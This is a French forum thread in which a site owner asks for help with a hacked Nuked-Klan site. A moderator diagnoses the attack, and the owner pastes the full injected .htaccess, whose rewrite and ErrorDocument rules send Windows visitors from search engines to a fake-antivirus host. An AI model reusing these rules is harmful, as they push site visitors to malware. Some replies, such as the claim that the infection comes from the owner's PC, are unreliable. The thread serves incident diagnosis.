Sujet Précédent Sujet Suivant

Probleme site infecté par un cheval de troie

Fermé
canonrock19 - Modifié par baladur13 le 20/05/2010 à 18:37
canonrock19 Messages postés 19 Date d'inscription mercredi 9 avril 2008 Statut Membre Dernière intervention 23 mai 2010 - 23 mai 2010 à 21:29
Bonjour,
lorsque je vais sur MON site :https://lesbadboys.fr/ mon avast pro 4.8 se met a s'affoler et a me signaler depui peu un cheval de troie de nom : JS:FakeAV-EI [Trj]

avec pour addresse ou nom de fichier

ps :ne cliquer pas dessus sauf si vous savez ce que vous faites !!! =>>>>
** lien douteux supprimé

alors je ne comprend pas je n'ai fais aucune modif sur mon site et ca me le fais sur 2 pc different donc je presume que ca vien du site ,

j'ai deja tenter un scan en ligne sur avg mais il echou et de restaurer ma base de donnée a 3 jour anterieur sans succes (le probleme reste le meme) mon hebergeur est infomaniak
merci de m'aider au plus vite
ps: ne suppirmer pas les liens je fais pas de pub pour lui mais ca aidera pour mon probleme je pense

A voir également:

4 réponses

Réponse 1 / 4
Malekal_morte- Messages postés 180230 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
Modifié par Malekal_morte- le 16/05/2010 à 20:30
Change pas d'antivirus..... Ca n'a rien à voir avec ton PC.

Donne le contenu du fichier .htaccess qui doit se trouver sur ton site (si tu y accès en FTP faut afficher les fichiers cachés);

Madness Rox \o/
1
canonrock19 Messages postés 19 Date d'inscription mercredi 9 avril 2008 Statut Membre Dernière intervention 23 mai 2010 1
16 mai 2010 à 20:27
celui qui est a la racine du site ???
0
Malekal_morte- Messages postés 180230 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
16 mai 2010 à 20:32
ouaip pour le fun, mais bon regarde le post en dessous :)
0
Réponse 2 / 4
Malekal_morte- Messages postés 180230 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
Modifié par Malekal_morte- le 16/05/2010 à 20:31
well... ton site s'est bien fait hacker...

malekalmorte@MaK-tux:/tmp$ wget http://www.lesbadboys.fr/.htaccess
--2010-05-16 20:24:55-- http://www.lesbadboys.fr/.htaccess
Resolving www.lesbadboys.fr... 84.16.95.174
Connecting to www.lesbadboys.fr|84.16.95.174|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://ns1.asmartmovehi.com/main.php?i=JciqitAZo/iljBj+XsRDy5EZ&e=3 [following]
--2010-05-16 20:24:55-- http://ns1.asmartmovehi.com/main.php?i=JciqitAZo/iljBj+XsRDy5EZ&e=3
Resolving ns1.asmartmovehi.com... 195.2.253.42
Connecting to ns1.asmartmovehi.com|195.2.253.42|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: 'main.php?i=JciqitAZo%2FiljBj+XsRDy5EZ&e=3'

[ <=> ] 77,143 169K/s in 0.4s

2010-05-16 20:24:56 (169 KB/s) - 'main.php?i=JciqitAZo%2FiljBj+XsRDy5EZ&e=3' saved [77143]

y a bien une redirection (HTTP 302)
ns1.asmartmovehi.com. étant une adresse qui conduit à une fausse page de scan qui propose le téléchargement d'un rogue, le truc classique, cf : https://forum.malekal.com/viewtopic.php?t=7139&start=



Un peu de lecture : https://nuked-klan.org/
Mise à jour majeur NK 1.7.8 et SP 4.5
jeudi 13 mai 2010

Suite à une découverte de vulnérabilités, les versions NK 1.7.7 et SP4.4 sont corrigées.

<mode devin qui agite ses mains autour de sa boule de cristal>
T'es en version en dessous :)
</mode devin qui agite ses mains autour de sa boule de cristal>

Madness Rox \o/
1
canonrock19 Messages postés 19 Date d'inscription mercredi 9 avril 2008 Statut Membre Dernière intervention 23 mai 2010 1
Modifié par canonrock19 le 16/05/2010 à 22:15
pour htaccess voici :



ErrorDocument 500 http://ns1.asmartmovehi.com/main.php?i=JciqitAZo/iljBj+XsRDy5EZ&e=0
ErrorDocument 502 http://ns1.asmartmovehi.com/main.php?i=JciqitAZo/iljBj+XsRDy5EZ&e=2
ErrorDocument 403 http://ns1.asmartmovehi.com/main.php?i=JciqitAZo/iljBj+XsRDy5EZ&e=3

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns1.asmartmovehi.com/main.php?e=r&h=%{HTTP_HOST}&i=JciqitAZo/iljBj+XsRDy5EZ [R,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns1.asmartmovehi.com/main.php?e=4&h=%{HTTP_HOST}&i=JciqitAZo/iljBj+XsRDy5EZ [R,L]


donc je fais quoi pour corriger ??? je fais juste la mise a jour ?
0
canonrock19 Messages postés 19 Date d'inscription mercredi 9 avril 2008 Statut Membre Dernière intervention 23 mai 2010 1
16 mai 2010 à 20:54
ps comment ta pu le scanner ??? j'aimerai pouvoir verifier apres la mise a jour que mon site soit bien clean
0
canonrock19 Messages postés 19 Date d'inscription mercredi 9 avril 2008 Statut Membre Dernière intervention 23 mai 2010 1
16 mai 2010 à 20:54
et merci de tes reponse
0
canonrock19 Messages postés 19 Date d'inscription mercredi 9 avril 2008 Statut Membre Dernière intervention 23 mai 2010 1
16 mai 2010 à 21:43
petite info tout mes fichier htaccess ont ete modifier de la sorte pfff et j'avais auccune copie
0
Malekal_morte- Messages postés 180230 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
Modifié par Malekal_morte- le 16/05/2010 à 21:57
c'est la dure jungle du WEB.

Faut absolument que tu mettes à jour ton CMS sinon tu vas encore te faire hacker...

Change tes mots de passe .
0
Réponse 3 / 4
fidraman Messages postés 182 Date d'inscription jeudi 3 juillet 2008 Statut Membre Dernière intervention 16 septembre 2010 9
16 mai 2010 à 20:12
Salut !
le virus à juste un origine ,c'est ton ordinateur.
solution proposée :
télécharger ton site sur ton ordinateur avec filezilla ou autre, faire un scan avec ton avast, surement il va le trouver son cheval de Troie, après sa suppression uploader ton site et vérifier l'existence du virus.
bonne chance
0
Réponse 4 / 4
the majik 05 Messages postés 33 Date d'inscription samedi 15 mai 2010 Statut Membre Dernière intervention 16 mai 2010 2
16 mai 2010 à 20:10
oui le site est infecté je ne sais quoi faire moi, faire un scan avec avira il est meilleur que avaste et avg.
-2
canonrock19 Messages postés 19 Date d'inscription mercredi 9 avril 2008 Statut Membre Dernière intervention 23 mai 2010 1
16 mai 2010 à 20:19
je confirme mais en version pro pour avast sa change les donnes non ?passer de la version pro d'avast a la version gratuite d'avira ca me chifonne , de plus le cheval de troie est sur le site alors pour scanner .... c'est pas evident sinon juste une info avast pro ou avira gratuit ??? lekel est le mieu ?? de plus pour mon cheval de troie seul avast le repere , les pote qui ont avira n'on aucun avertissement (c'est juste pour savoir ca se trouve mon avast me dit n'importe quoi et ca m'arrangerai mais je tient a nettoyer mon site en cas de pepin
0

Discussions similaires

Colis en cours de transport vers votre site de livraison ?
Ninan_5568 -
JulieVdr -

7 réponses
'Votre colis est dans le site de livraison qui dessert votre adresse' que faire
relakztek82 -
Unemeuf -

25 réponses
Site fiable pour achter des tn
Yanis93380 -
Yanis93380 -

16 réponses
Fiabilité site wardow.com
Camgu -
Chris -

5 réponses